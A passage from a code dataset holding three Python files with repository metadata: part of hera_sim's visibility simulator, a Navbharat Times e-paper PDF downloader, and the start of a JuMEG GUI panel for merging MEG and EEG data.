a ``UVData`` object.\n\n Parameters\n ----------\n data\n Either a ``UVData`` object or a path-like object to a file\n that can be loaded into a ``UVData`` object. If not provided,\n then sufficient keywords for initializing a ``UVData`` object\n must be provided. 
See :func:`io.empty_uvdata` for more\n information on which keywords are needed.\n\n Raises\n ------\n TypeError\n If the provided value for ``data`` is not an object that can\n be cast to a ``UVData`` object.\n \"\"\"\n if data is None:\n self.data = io.empty_uvdata(**kwargs)\n elif isinstance(data, (str, Path)):\n self.data = self._read_datafile(data, **kwargs)\n self.data.extra_keywords[\"data_file\"] = data\n elif isinstance(data, UVData):\n self.data = data\n else:\n raise TypeError(\n \"data type not understood. Only a UVData object or a path to \"\n \"a UVData-compatible file may be passed as the data parameter. \"\n \"Otherwise, keywords must be provided to build a UVData object.\"\n )\n\n if not self.data.future_array_shapes: # pragma: nocover\n self.data.use_future_array_shapes()\n\n def _initialize_args_from_model(self, model):\n \"\"\"\n Retrieve the LSTs and/or frequencies required for a model.\n\n Parameters\n ----------\n model: callable\n Model whose argspec is to be inspected and recovered.\n\n Returns\n -------\n model_params: dict\n Dictionary mapping positional argument names to either an\n ``inspect._empty`` object or the relevant parameters pulled\n from the ``Simulator`` object. The only parameters that are\n not ``inspect._empty`` are \"lsts\" and \"freqs\", should they\n appear in the model's argspec.\n\n Examples\n --------\n Suppose we have the following function::\n\n def func(freqs, ants, other=None):\n pass\n\n The returned object would be a dictionary with keys ``freqs`` and\n ``ants``, with the value for ``freqs`` being ``self.freqs`` and\n the value for ``ants`` being ``inspect._empty``. Since ``other``\n has a default value, it will not be in the returned dictionary.\n \"\"\"\n model_params = self._get_model_parameters(model)\n model_params = {\n k: v\n for k, v in model_params.items()\n if v is inspect._empty or k in model.attrs_to_pull\n }\n\n # Pull any attributes from the Simulator that are required.\n args = {}\n for param, value in model_params.items():\n if hasattr(self, param) and value in (None, inspect._empty):\n args[param] = getattr(self, param)\n\n model_params.update(args)\n\n return model_params\n\n def _iterate_antpair_pols(self):\n \"\"\"Loop through all baselines and polarizations.\"\"\"\n for ant1, ant2, pol in self.data.get_antpairpols():\n blt_inds = self.data.antpair2ind((ant1, ant2))\n pol_ind = self.data.get_pols().index(pol)\n if blt_inds.size:\n yield ant1, ant2, pol, blt_inds, pol_ind\n\n def _iteratively_apply(\n self,\n model: SimulationComponent,\n *,\n add_vis: bool = True,\n ret_vis: bool = False,\n seed: Optional[Union[str, int]] = None,\n vis_filter: Optional[Sequence] = None,\n antpairpol_cache: Optional[Sequence[AntPairPol]] = None,\n **kwargs,\n ) -> Optional[Union[np.ndarray, dict[int, np.ndarray]]]:\n \"\"\"\n Simulate an effect for an entire array.\n\n This method loops over every baseline and polarization in order\n to simulate the effect ``model`` for the full array. The result\n is optionally applied to the simulation's data and/or returned.\n\n Parameters\n ----------\n model\n Callable model used to simulate an effect.\n add_vis\n Whether to apply the effect to the simulation data. Default\n is to apply the effect.\n ret_vis\n Whether to return the simulated effect. Default is to not\n return the effect. Type of returned object depends on whether\n the effect is multiplicative or not.\n seed\n Either an integer specifying the seed to be used in setting\n the random state, or one of a select few keywords. 
Default\n            is to use the current random state. See :meth:`_seed_rng`\n            for descriptions of the supported seeding modes.\n        vis_filter\n            List of antennas, baselines, polarizations, antenna-polarization\n            pairs, or antpairpols for which to simulate the effect. This\n            specifies which of the above the effect is to be simulated for,\n            and anything that does not meet the keys specified in this list\n            does not have the effect applied to it. See :meth:`_apply_filter`\n            for more details.\n        antpairpol_cache\n            List of (ant1, ant2, pol) tuples specifying which antpairpols have\n            already had the effect simulated. Not intended for use by the\n            typical end-user.\n        kwargs\n            Extra parameters passed to ``model``.\n\n        Returns\n        -------\n        effect: np.ndarray or dict\n            The simulated effect. Only returned if ``ret_vis`` is set to True.\n            If the effect is *not* multiplicative, then the returned object\n            is an ndarray; otherwise, a dictionary mapping antenna numbers\n            to ndarrays is returned.\n        \"\"\"\n        # There's nothing to do if we're neither adding nor returning.\n        if not add_vis and not ret_vis:\n            warnings.warn(\n                \"You have chosen to neither add nor return the effect \"\n                \"you are trying to simulate, so nothing will be \"\n                f\"computed. This warning was raised for the model: {model}\",\n                stacklevel=2,\n            )\n            return\n\n        # Initialize the antpairpol cache if we need to.\n        if antpairpol_cache is None:\n            antpairpol_cache = []\n\n        # Pull relevant parameters from Simulator.\n        # Also make placeholders for antenna/baseline dependent parameters.\n        base_args = self._initialize_args_from_model(model)\n\n        # Get a copy of the data array.\n        data_copy = self.data.data_array.copy()\n\n        # Pull useful auxiliary parameters.\n        is_multiplicative = getattr(model, \"is_multiplicative\", None)\n        is_smooth_in_freq = getattr(model, \"is_smooth_in_freq\", True)\n        if is_multiplicative is None:\n            warnings.warn(\n                \"You are attempting to compute a component but have \"\n                \"not specified an ``is_multiplicative`` attribute for \"\n                \"the component. 
The component will be added under \"\n \"the assumption that it is *not* multiplicative.\",\n stacklevel=2,\n )\n is_multiplicative = False\n\n # Pre-simulate gains.\n if is_multiplicative:\n gains = {}\n args = self._update_args(base_args, model)\n args.update(kwargs)\n for pol in self.data.get_feedpols():\n if seed:\n seed = self._seed_rng(seed, model, pol=pol)\n polarized_gains = model(**args)\n for ant, gain in polarized_gains.items():\n gains[(ant, pol)] = gain\n\n # Determine whether to use cached filters, and which ones to use if so.\n model_kwargs = getattr(model, \"kwargs\", {})\n use_cached_filters = any(\"filter\" in key for key in model_kwargs)\n get_delay_filter = (\n is_smooth_in_freq\n and \"delay_filter_kwargs\" not in kwargs\n and \"delay_filter_kwargs\" in model_kwargs\n and bool(self._filter_cache[\"delay\"])\n )\n get_fringe_filter = (\n \"fringe_filter_kwargs\" not in kwargs\n and \"fringe_filter_kwargs\" in model_kwargs\n and bool(self._filter_cache[\"fringe\"])\n )\n use_cached_filters &= get_delay_filter or get_fringe_filter\n\n if model.return_type == \"full_array\":\n args = self._update_args(base_args, model)\n args.update(kwargs)\n data_copy += model(**args)\n else:\n # Iterate over the array and simulate the effect as-needed.\n for ant1, ant2, pol, blt_inds, pol_ind in self._iterate_antpair_pols():\n # Determine whether or not to filter the result.\n apply_filter = self._apply_filter(\n utils._listify(vis_filter), ant1, ant2, pol\n )\n if apply_filter:\n continue\n\n # Check if this antpairpol or its conjugate have been simulated.\n bl_in_cache = (ant1, ant2, pol) in antpairpol_cache\n conj_in_cache = (ant2, ant1, pol) in antpairpol_cache\n\n # Seed the random number generator.\n key = (ant2, ant1, pol) if conj_in_cache else (ant1, ant2, pol)\n seed = self._seed_rng(seed, model, *key)\n\n # Prepare the actual arguments to be used.\n use_args = self._update_args(base_args, model, ant1, ant2, pol)\n use_args.update(kwargs)\n if use_cached_filters:\n filter_kwargs = self._get_filters(\n ant1,\n ant2,\n get_delay_filter=get_delay_filter,\n get_fringe_filter=get_fringe_filter,\n )\n use_args.update(filter_kwargs)\n\n # Cache simulated antpairpols if not filtered out.\n if not (bl_in_cache or conj_in_cache or apply_filter):\n antpairpol_cache.append((ant1, ant2, pol))\n\n # Check whether we're simulating a gain or a visibility.\n if is_multiplicative:\n # Calculate the complex gain, but only apply it if requested.\n gain = gains[(ant1, pol[0])] * np.conj(gains[(ant2, pol[1])])\n data_copy[blt_inds, :, pol_ind] *= gain\n else:\n # I don't think this will ever be executed, but just in case...\n if conj_in_cache and seed is None: # pragma: no cover\n conj_blts = self.data.antpair2ind((ant2, ant1))\n vis = (data_copy - self.data.data_array)[\n conj_blts, :, pol_ind\n ].conj()\n else:\n vis = model(**use_args)\n\n # and add it in\n data_copy[blt_inds, :, pol_ind] += vis\n\n # return the component if desired\n # this is a little complicated, but it's done this way so that\n # there aren't *three* copies of the data array floating around\n # this is to minimize the potential of triggering a MemoryError\n if ret_vis:\n # return the gain dictionary if gains are simulated\n if is_multiplicative:\n return gains\n data_copy -= self.data.data_array\n # the only time we're allowed to have add_vis be False is\n # if ret_vis is True, and nothing happens if both are False\n # so this is the *only* case where we'll have to reset the\n # data array\n if add_vis:\n self.data.data_array 
+= data_copy\n # otherwise return the actual visibility simulated\n return data_copy\n else:\n self.data.data_array = data_copy\n\n @staticmethod\n def _read_datafile(datafile: Union[str, Path], **kwargs) -> UVData:\n \"\"\"Read a file as a ``UVData`` object.\n\n Parameters\n ----------\n datafile\n Path to a file containing visibility data readable by ``pyuvdata``.\n **kwargs\n Arguments passed to the ``UVData.read`` method.\n\n Returns\n -------\n UVData\n The read-in data object.\n \"\"\"\n uvd = UVData()\n uvd.read(datafile, read_data=True, **kwargs)\n return uvd\n\n def _seed_rng(self, seed, model, ant1=None, ant2=None, pol=None):\n \"\"\"\n Set the random state according to the provided parameters.\n\n This is a helper function intended to be used solely in the\n :meth:`_iteratively_apply` method. It exists in order to ensure that\n the simulated data is as realistic as possible, assuming the user\n understands the proper choice of seeding method to use for the\n various effects that can be simulated.\n\n Parameters\n ----------\n seed\n Either the random seed to use (when provided as an integer),\n or one of the following keywords:\n\n ``\"once\"``:\n The random state is set to the same value for\n every baseline and polarization; one unique seed is\n created for each model that uses this seeding mode.\n This is recommended for simulating point-source foregrounds\n and per-antenna effects.\n ``\"redundant\"``:\n The random state is only uniquely set once per redundant\n group for a given model. This is recommended for simulating\n diffuse foregrounds and the reionization signal.\n ``\"initial\"``:\n The random state is set at the very beginning of the\n iteration over the array. This is essentially the same as\n using a seeding mode of ``None``, though not identical.\n This is recommended for simulating thermal noise, or for\n simulating an effect that has a random component that\n changes between baselines.\n\n model\n Name of the model for which to either recover or cache the seed.\n This is used to lookup random state seeds in the :attr:`_seeds`\n dictionary.\n ant1\n First antenna in the baseline.\n ant2\n Second antenna in the baseline (for baseline-dependent effects).\n pol\n Polarization string.\n\n Returns\n -------\n updated_seed\n Either the input seed or ``None``, depending on the provided seed.\n This is just used to ensure that the logic for setting the random\n state in the :meth:`_iteratively_apply` routine works out.\n\n Raises\n ------\n TypeError\n The provided seed is not ``None``, an integer, or a string.\n ValueError\n Two cases: one, the ``\"redundant\"`` seeding mode is being used\n and a baseline isn't provided; two, the seed is a string, but\n is not one of the supported seeding modes.\n \"\"\"\n if seed is None:\n return\n if type(seed) is int:\n np.random.seed(seed)\n return seed\n if not isinstance(seed, str):\n raise TypeError(\n \"The seeding mode must be specified as a string or integer. 
\"\n \"If an integer is provided, then it will be used as the seed.\"\n )\n if seed == \"redundant\":\n if ant1 is None or ant2 is None:\n raise ValueError(\n \"A baseline must be specified in order to \"\n \"seed by redundant group.\"\n )\n # Determine the key for the redundant group this baseline is in.\n bl_int = self.data.antnums_to_baseline(ant1, ant2)\n key = (next(reds for reds in self.red_grps if bl_int in reds)[0],)\n if pol:\n key += (pol,)\n # seed the RNG accordingly\n np.random.seed(self._get_seed(model, key))\n return \"redundant\"\n elif seed == \"once\":\n # this option seeds the RNG once per iteration of\n # _iteratively_apply, using the same seed every time\n # this is appropriate for antenna-based gains (where the\n # entire gain dictionary is simulated each time), or for\n # something like PointSourceForeground, where objects on\n # the sky are being placed randomly\n key = (pol,) if pol else 0\n np.random.seed(self._get_seed(model, key))\n return \"once\"\n elif seed == \"initial\":\n # this seeds the RNG once at the very beginning of\n # _iteratively_apply. this would be useful for something\n # like ThermalNoise\n key = (pol,) if pol else -1\n np.random.seed(self._get_seed(model, key))\n return None\n else:\n raise ValueError(\"Seeding mode not supported.\")\n\n def _update_args(self, args, model, ant1=None, ant2=None, pol=None):\n \"\"\"\n Scan the provided arguments and pull data as necessary.\n\n This method searches the provided dictionary for various positional\n arguments that can be determined by data stored in the ``Simulator``\n instance. Please refer to the source code to see what argument\n names are searched for and how their values are obtained.\n\n Parameters\n ----------\n args: dict\n Dictionary mapping names of positional arguments to either\n a value pulled from the ``Simulator`` instance or an\n ``inspect._empty`` object. See .. meth: _initialize_args_from_model\n for details on what to expect (these two methods are always\n called in conjunction with one another).\n model: SimulationComponent\n The model being simulated. The model will define which attributes\n should be pulled from the ``Simulator``.\n ant1: int, optional\n Required parameter if an autocorrelation visibility or a baseline\n vector is in the keys of ``args``.\n ant2: int, optional\n Required parameter if a baseline vector is in the keys of ``args``.\n pol: str, optional\n Polarization string. 
Currently not used.\n \"\"\"\n # TODO: review this and see if there's a smarter way to do it.\n new_params = {}\n for param, attr in model.attrs_to_pull.items():\n if param in (\"autovis\", \"autovis_i\"):\n new_params[param] = self.data.get_data(ant1, ant1, pol)\n elif param == \"autovis_j\":\n new_params[param] = self.data.get_data(ant2, ant2, pol)\n elif param == \"bl_vec\":\n bl_vec = self.antpos[ant2] - self.antpos[ant1]\n new_params[param] = bl_vec / const.c.to(\"m/ns\").value\n elif param == \"antpair\":\n new_params[param] = (ant1, ant2)\n else:\n # The parameter can be retrieved directly from the Simulator\n new_params[param] = getattr(self, attr)\n\n use_args = args.copy()\n use_args.update(new_params)\n return use_args\n\n def _get_filters(\n self,\n ant1: int,\n ant2: int,\n *,\n get_delay_filter: bool = True,\n get_fringe_filter: bool = True,\n ) -> dict[str, np.ndarray]:\n \"\"\"\n Retrieve delay and fringe filters from the cache.\n\n Parameters\n ----------\n ant1\n First antenna in the baseline.\n ant2\n Second antenna in the baseline.\n get_delay_filter\n Whether to retrieve the delay filter.\n get_fringe_filter\n Whether to retrieve the fringe filter.\n\n Returns\n -------\n filters\n Dictionary containing the fringe and delay filters that\n have been pre-calculated for the provided baseline.\n \"\"\"\n filters = {}\n if not get_delay_filter and not get_fringe_filter:\n # Save some CPU cycles.\n return filters\n bl_int = self.data.antnums_to_baseline(ant1, ant2)\n conj_bl_int = self.data.antnums_to_baseline(ant2, ant1)\n is_conj = False\n for red_grp in self.red_grps:\n if bl_int in red_grp:\n key = sorted(red_grp)[0]\n break\n if conj_bl_int in red_grp:\n key = sorted(red_grp)[0]\n is_conj = True\n break\n if get_delay_filter:\n delay_filter = self._filter_cache[\"delay\"][key]\n filters[\"delay_filter_kwargs\"] = {\"delay_filter\": delay_filter}\n if get_fringe_filter:\n fringe_filter = self._filter_cache[\"fringe\"][key]\n if is_conj:\n # Fringes are seen to move in the opposite direction.\n fringe_filter = fringe_filter[::-1, :]\n filters[\"fringe_filter_kwargs\"] = {\"fringe_filter\": fringe_filter}\n return filters\n\n @staticmethod\n def _get_model_parameters(model):\n \"\"\"Retrieve the full model signature (init + call) parameters.\"\"\"\n init_params = inspect.signature(model.__class__).parameters\n call_params = inspect.signature(model).parameters\n # this doesn't work correctly if done on one line\n model_params = {}\n for params in (call_params, init_params):\n for parameter, value in params.items():\n model_params[parameter] = value.default\n model_params.pop(\"kwargs\", None)\n return model_params\n\n @staticmethod\n def _get_component(\n component: Union[str, type[SimulationComponent], SimulationComponent]\n ) -> Union[SimulationComponent, type[SimulationComponent]]:\n \"\"\"Normalize a component to be either a class or instance.\"\"\"\n if np.issubclass_(component, SimulationComponent):\n return component\n elif isinstance(component, str):\n try:\n return get_model(component)\n except KeyError:\n raise ValueError(\n f\"The model {component!r} does not exist. The following models are \"\n f\"available: \\n{list_all_components()}.\"\n )\n elif isinstance(component, SimulationComponent):\n return component\n else:\n raise TypeError(\n \"The input type for the component was not understood. \"\n \"Must be a string, or a class/instance of type 'SimulationComponent'. 
\"\n f\"Available component models are:\\n{list_all_components()}\"\n )\n\n def _generate_seed(self, model, key):\n \"\"\"Generate a random seed based on the current time.\n\n Populate the ``_seeds`` dictionary appropriately with the result.\n \"\"\"\n model = self._get_model_name(model)\n # for the sake of randomness\n np.random.seed(int(time.time() * 1e6) % 2**32)\n if model not in self._seeds:\n self._seeds[model] = {}\n self._seeds[model][key] = np.random.randint(2**32)\n\n def _get_seed(self, model, key):\n \"\"\"Retrieve or generate a random seed given a model and key.\"\"\"\n model = self._get_model_name(model)\n if model not in self._seeds:\n self._generate_seed(model, key)\n if key not in self._seeds[model]:\n self._generate_seed(model, key)\n return self._seeds[model][key]\n\n @staticmethod\n def _get_model_name(model):\n \"\"\"Find out the (lowercase) name of a provided model.\"\"\"\n if isinstance(model, str):\n return model.lower()\n elif np.issubclass_(model, SimulationComponent):\n return model.__name__.lower()\n elif isinstance(model, SimulationComponent):\n return model.__class__.__name__.lower()\n else:\n raise TypeError(\n \"You are trying to simulate an effect using a custom function. \"\n \"Please refer to the tutorial for instructions regarding how \"\n \"to define new simulation components compatible with the Simulator.\"\n )\n\n def _parse_key(self, key: Union[int, str, AntPair, AntPairPol]) -> AntPairPol:\n \"\"\"Convert a key of at-most length-3 to an (ant1, ant2, pol) tuple.\"\"\"\n if key is None:\n ant1, ant2, pol = None, None, None\n elif np.issubdtype(type(key), int):\n # Figure out if it's an antenna or baseline integer\n if key in self.antpos:\n ant1, ant2, pol = key, None, None\n else:\n ant1, ant2 = self.data.baseline_to_antnums(key)\n pol = None\n elif isinstance(key, str):\n if key.lower() in (\"auto\", \"cross\"):\n raise NotImplementedError(\"Functionality not yet supported.\")\n ant1, ant2, pol = None, None, key\n else:\n try:\n iter(key)\n if len(key) not in (2, 3):\n raise TypeError\n except TypeError:\n raise ValueError(\n \"Key must be an integer, string, antenna pair, or antenna \"\n \"pair with a polarization string.\"\n )\n if len(key) == 2:\n if all(type(val) is int for val in key):\n ant1, ant2 = key\n pol = None\n else:\n ant1, pol = key\n ant2 = None\n else:\n ant1, ant2, pol = key\n return ant1, ant2, pol\n\n def _sanity_check(self, model):\n \"\"\"Check that simulation components are applied sensibly.\"\"\"\n has_data = not np.all(self.data.data_array == 0)\n is_multiplicative = getattr(model, \"is_multiplicative\", False)\n contains_multiplicative_effect = any(\n self._get_component(component[\"alias\"]).is_multiplicative\n for component in self._components.values()\n )\n\n if is_multiplicative and not has_data:\n warnings.warn(\n \"You are trying to compute a multiplicative \"\n \"effect, but no visibilities have been simulated yet.\",\n stacklevel=1,\n )\n elif not is_multiplicative and contains_multiplicative_effect:\n warnings.warn(\n \"You are adding visibilities to a data array \"\n \"*after* multiplicative effects have been introduced.\",\n stacklevel=1,\n )\n\n def _update_history(self, model, **kwargs):\n \"\"\"Record the component simulated and its parameters in the history.\"\"\"\n component = self._get_model_name(model)\n vis_filter = kwargs.pop(\"vis_filter\", None)\n msg = f\"hera_sim v{__version__}: Added {component} using parameters:\\n\"\n for param, value in defaults._unpack_dict(kwargs).items():\n msg += f\"{param} = 
{value}\\n\"\n if vis_filter is not None:\n msg += \"Effect simulated for the following antennas/baselines/pols:\\n\"\n msg += \", \".join(vis_filter)\n self.data.history += msg\n\n def _update_seeds(self, model_name=None):\n \"\"\"Update the seeds in the extra_keywords property.\"\"\"\n seed_dict = {}\n for component, seeds in self._seeds.items():\n if model_name is not None and component != model_name:\n continue\n\n if len(seeds) == 1:\n seed = list(seeds.values())[0]\n key = \"_\".join([component, \"seed\"])\n seed_dict[key] = seed\n else:\n # This should only be raised for seeding by redundancy.\n # Each redundant group is denoted by the *first* baseline\n # integer for the particular redundant group. See the\n # _generate_redundant_seeds method for reference.\n for bl_int, seed in seeds.items():\n key = \"_\".join([component, \"seed\", str(bl_int)])\n seed_dict[key] = seed\n\n # Now actually update the extra_keywords dictionary.\n self.data.extra_keywords.update(seed_dict)\n\n def _validate_get_request(\n self, model: Component, ant1: int, ant2: int, pol: str\n ) -> None:\n \"\"\"Verify that the provided antpairpol is appropriate given the model.\"\"\"\n if getattr(model, \"is_multiplicative\", False):\n pols = self.data.get_feedpols()\n pol_type = \"Feed\"\n else:\n pols = self.pols\n pol_type = \"Visibility\"\n if ant1 is None and ant2 is None:\n if pol is None or pol in pols:\n return\n else:\n raise ValueError(f\"{pol_type} polarization {pol} not found.\")\n\n if pol is not None and pol not in pols:\n raise ValueError(f\"{pol_type} polarization {pol} not found.\")\n\n if getattr(model, \"is_multiplicative\", False):\n if ant1 is not None and ant2 is not None:\n raise ValueError(\n \"At most one antenna may be specified when retrieving \"\n \"a multiplicative effect.\"\n )\n else:\n if (ant1 is None) ^ (ant2 is None):\n raise ValueError(\n \"Either no antennas or a pair of antennas must be provided \"\n \"when retrieving a non-multiplicative effect.\"\n )\n if ant1 not in self.antpos or ant2 not in self.antpos:\n raise ValueError(\"At least one antenna is not in the array layout.\")\n","repo_name":"HERA-Team/hera_sim","sub_path":"hera_sim/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":63166,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"} +{"seq_id":"41005200611","text":"from bs4 import BeautifulSoup\nfrom requests import get\nfrom datetime import datetime as dt\nfrom time import sleep\nfrom os import mkdir\nfrom os.path import isdir \nfrom writetofile import write\nfrom mergePDF import merge\nimport re\nclass EPAPER:\n base_url = \"http://epaper.navbharattimes.com\"\n pdf_url = \"http://image.epaper.navbharattimes.com/epaperimages//{date}//{date}-md-{region}-\"\n region = \"de\"\n # region = \"mu\"\n edition = \"13@13\"\n # edition = \"16@16\"\n date = \"{day}@{month}@{year}\"\n nbtepaper = \"/paper/{pgno}-{edition}-{date}-1001.html\"\n paper_path = \"\"\n publishDate = None\n \n def __init__(self, publishDate, edition=None):\n if not isinstance(publishDate, dt):\n print(\"Error: Invalid date entered\")\n return\n\n if edition is not None and self.__is_valid_edition(edition):\n self.edition = edition\n print(\"Status: Setting edition: %s\" % edition)\n\n self.publishDate = publishDate\n date = self.__formatDate(publishDate)\n \n if(len(date) > 0):\n self.date = self.date.format(day=date[\"day\"],month=date[\"month\"],year=date[\"year\"])\n self.paper_path = self.date + \"/\"\n print(\"Status: Date set: 
\" + self.date)\n else:\n print(\"Error: Could not format date\")\n \n def __is_valid_edition(self, edition):\n pattern = \"^\\d{1,2}@\\d{2}$\"\n a = re.search(pattern, edition)\n return a != None\n \n def get_paper_path(self):\n return self.paper_path\n\n def __formatDate(self, date):\n d = {}\n if date is not None:\n d[\"day\"] = \"{:02d}\".format(date.day)\n d[\"month\"] = \"{:02d}\".format(date.month)\n d[\"year\"] = \"{:04d}\".format(date.year)\n else:\n print(\"Error: Invalid date argument passed\")\n return d\n\n def downloadPaper(self, count=-1):\n count += 1\n if count > 2:\n print(\"Error: Unable to download newspaper for this date\")\n return False\n response = get(\n self.base_url +\n self.nbtepaper.format(\n pgno=1,\n edition=self.edition,\n date=self.date\n )\n )\n if response.status_code == 200:\n if not isdir(self.paper_path):\n mkdir(self.paper_path)\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n #changed span class from headforpagenext to pagedeselect\n span = soup.findAll(\"span\", {\"class\":\"pagedeselect\"})\n pages = [ int(x.get_text().split(\"-\")[-1]) for x in span]\n if(len(pages) > 0):\n print(\"Total {} pages\".format( len(span) + 1) )\n else:\n print(\"Error: Unable to download newspaper for this date\")\n return False\n return self.__fetch(pages)\n else:\n print(\"Error: could not establish value for page no's, trying again in 5 seconds\")\n self.downloadPaper()\n\n def __generatePDFURL(self,page):\n date = self.__formatDate(self.publishDate)\n datestring = date[\"day\"] + date[\"month\"] + date[\"year\"]\n self.pdf_url = self.pdf_url.format(date=datestring, region=self.region)\n return self.pdf_url + str(page) + \".pdf\"\n\n def __fetch(self, pages):\n for pageno in pages:\n content = None\n while content is None:\n print(\"Status: Fetching page no {} of {}\".format(pageno, len(pages)))\n response = get(\n self.base_url +\n self.nbtepaper.format(\n pgno=pageno,\n edition=self.edition,\n date=self.date\n )\n )\n if response.status_code == 200:\n content = response.text\n break\n else:\n print(\"Error: no response recieved on page %d, trying again in 5 seconds\" % pageno)\n sleep(5)\n if content is not None: \n filename = self.paper_path + \"{:02d}.pdf\".format(pageno)\n url = self.__generatePDFURL(pageno)\n print(\"Status: Generating File-{}\".format(filename))\n if not write(filename=filename, url=url):\n print(\"Error: Could not download newspaper for this date\")\n return False\n\n filename = self.publishDate.strftime(\"NBT %d %B %Y.pdf\")\n if not merge(self.paper_path, filename):\n print(\"Error: Could not create PDF for newspaper\")\n return False\n return filename\n","repo_name":"devRawnie/NBT-Epaper","sub_path":"epaperHandler.py","file_name":"epaperHandler.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23476821673","text":"#!/usr/bin/env python3\n# -+-coding: utf-8 -+-\n\n\"\"\"\nJuMEG GUI to merge MEG (FIF) and EEG data (BrainVision)\ncall <jumeg_merge_meeeg> with meg and eeg file and parameters\n\"\"\"\n\n#--------------------------------------------\n# Authors: Frank Boers <f.boers@fz-juelich.de>\n#\n#--------------------------------------------\n# Date: 21.11.18\n#--------------------------------------------\n# License: BSD (3-clause)\n#--------------------------------------------\n# Updates\n#--------------------------------------------\nimport os\nimport wx\nfrom pubsub import pub\n\n#--- jumeg wx stuff\nfrom 
jumeg.gui.wxlib.jumeg_gui_wxlib_main_frame import JuMEG_wxMainFrame\nfrom jumeg.gui.wxlib.jumeg_gui_wxlib_main_panel import JuMEG_wxMainPanel\nfrom jumeg.gui.wxlib.utils.jumeg_gui_wxlib_utils_controls import JuMEG_wxSplitterWindow,JuMEG_wxCMDButtons,JuMEG_wxControlGrid,JuMEG_wxControlButtonPanel\n\n#--- Experiment Template\nfrom jumeg.gui.wxlib.jumeg_gui_wxlib_experiment_template import JuMEG_wxExpTemplate\n#---Merger CTRLs\nfrom jumeg.gui.wxlib.jumeg_gui_wxlib_psel_meeg import JuMEG_wxPselMEEG\n#---\nfrom jumeg.gui.wxlib.jumeg_gui_wxlib_pbshost import JuMEG_wxPBSHosts\nfrom jumeg.gui.jumeg_gui_wx_argparser import JuMEG_GUI_wxArgvParser\n#---\nfrom jumeg.base.jumeg_base import jumeg_base as jb\nfrom jumeg.base.ioutils.jumeg_ioutils_subprocess import JuMEG_IoUtils_SubProcess\n\n__version__=\"2019.05.14.001\"\n\nclass JuMEG_wxMEEGMergerPanel(JuMEG_wxMainPanel):\n \"\"\"\n GUI Panel to merge EEG and MEG data into MNE fif format\n \"\"\"\n\n def __init__(self, parent,name=\"JUMEG_MEEG_MERGER\",**kwargs):\n super().__init__(parent,name=name,ShowTitleB=False)\n \n self.ShowCmdButtons = True\n self.ShowTopPanel = True\n self.ShowTitleA = True\n self.ShowTitleB = True\n self.ShowMinMaxBt = True\n self.module_path = os.getenv(\"JUMEG_PATH\") + \"/jumeg/tools/\"\n self.module_name = \"jumeg_io_merge_meeg\"\n self.module_extention = \".py\"\n self.SubProcess = JuMEG_IoUtils_SubProcess()\n self._template_panel_name = \"EXPERIMENT_TEMPLATE\"\n self._init(**kwargs)\n\n @property\n def fullfile(self): return self.module_path+\"/\"+self.module_name+ self.module_extention\n\n def update(self,**kwargs):\n self.stage = kwargs.get(\"stage\", os.getenv(\"JUMEG_PATH_JUMEG\", os.getcwd()) + \"/preproc\" )\n #-- update wx CTRLs\n self.PanelA.SetTitle(v=\"PDF`s\")\n #---\n ds=1\n LEA = wx.ALIGN_LEFT | wx.EXPAND | wx.ALL\n #-- Top\n self.ExpTemplate = JuMEG_wxExpTemplate(self.TopPanel,name=self.GetName()+\".\"+self._template_panel_name)\n self.HostCtrl = JuMEG_wxPBSHosts(self.TopPanel, prefix=self.GetName())\n self.TopPanel.GetSizer().Add(self.ExpTemplate,3,LEA,ds)\n self.TopPanel.GetSizer().Add(self.HostCtrl,1, wx.ALIGN_RIGHT | wx.EXPAND | wx.ALL,ds)\n #--- A IDs;PDFs\n self.PDFBox = JuMEG_wxPselMEEG(self.PanelA.Panel,name=self.GetName()+\".PDFBOX_MEEG\",**kwargs)\n self.PanelA.Panel.GetSizer().Add(self.PDFBox, 1, LEA,ds)\n # --- B right\n self.AP = JuMEG_GUI_wxArgvParser(self.PanelB.Panel,name=self.GetName()+\".AP\",use_pubsub=self.use_pubsub, fullfile=self.fullfile,\n module=self.module_name, ShowParameter=True)\n self.PanelB.Panel.GetSizer().Add(self.AP, 1, LEA,ds)\n self.PanelB.SetTitle(\"\")\n #---\n self.Bind(wx.EVT_BUTTON, self.ClickOnCtrls)\n self.update_argparser_parameter()\n \n def update_on_display(self):\n self.SplitterAB.SetSashPosition(self.GetSize()[0] / 2.0,redraw=True)\n \n def update_argparser_parameter(self):\n \"\"\" update parameter BADS_LIST from template\"\"\"\n self.AP.update_parameter(\"BADS_LIST\",self.ExpTemplate.TMP.bads)\n \n def _update_hosts(self):\n pass\n\n def ClickOnExperimentTemplateUpdate(self,stage=None,scan=None,data_type=None):\n \"\"\"\n call PDFSelectionBox.update_ids and update PDF.ID.listbox\n reset PDFs for new selection\n\n Parameter\n ---------\n stage: stage / path to data\n scan: name of scan\n data_type: mne / eeg\n \"\"\"\n self.PDFBox.update(stage=stage,scan=scan,reset=True,verbose=self.verbose,debug=self.debug)\n self.update_argparser_parameter()\n \n def init_pubsub(self, **kwargs):\n \"\"\" init pubsub call overwrite \"\"\"\n # 
pub.subscribe(self.ClickOnApply,self.GetName().upper()+\".BT_APPLY\")\n pub.subscribe(self.ClickOnExperimentTemplateUpdate, self.ExpTemplate.GetMessage(\"UPDATE\"))\n \n def ClickOnApply(self):\n \"\"\"\n get selected pdfs structure\n make commands with argparser parameter\n apply cmds to subprocess\n\n \"\"\"\n \n self.PDFBox.verbose = self.verbose\n pdfs = self.PDFBox.GetSelectedPDFs()\n if not pdfs:\n wx.CallAfter(pub.sendMessage,\"MAIN_FRAME.MSG.ERROR\",data=\"\\nPlease select PDFs first\\n in: \" + self.GetName())\n return\n \n #cmd_parameter = self.AP.GetParameter()\n cmd_command = self.AP.get_fullfile_command(ShowFileIO=True)\n joblist = []\n\n #--- del \"stage\"\n cmd_list = cmd_command.split()\n for k in [\"--meg_stage\",\"--eeg_stage\",\"-smeg\",\"-seeg\",\"--list_path\"]:\n for idx in range(len(cmd_list)):\n if cmd_list[idx].startswith(k):\n del cmd_list[idx]\n break\n \n cmd_command = \" \".join(cmd_list)\n # print(cmd_command)\n \n for subject_id in pdfs.get('mne'):\n for idx in range( len( pdfs['mne'][subject_id] ) ):\n if not pdfs['mne'][subject_id][idx][\"selected\"]: continue\n cmd = cmd_command\n eeg_idx = 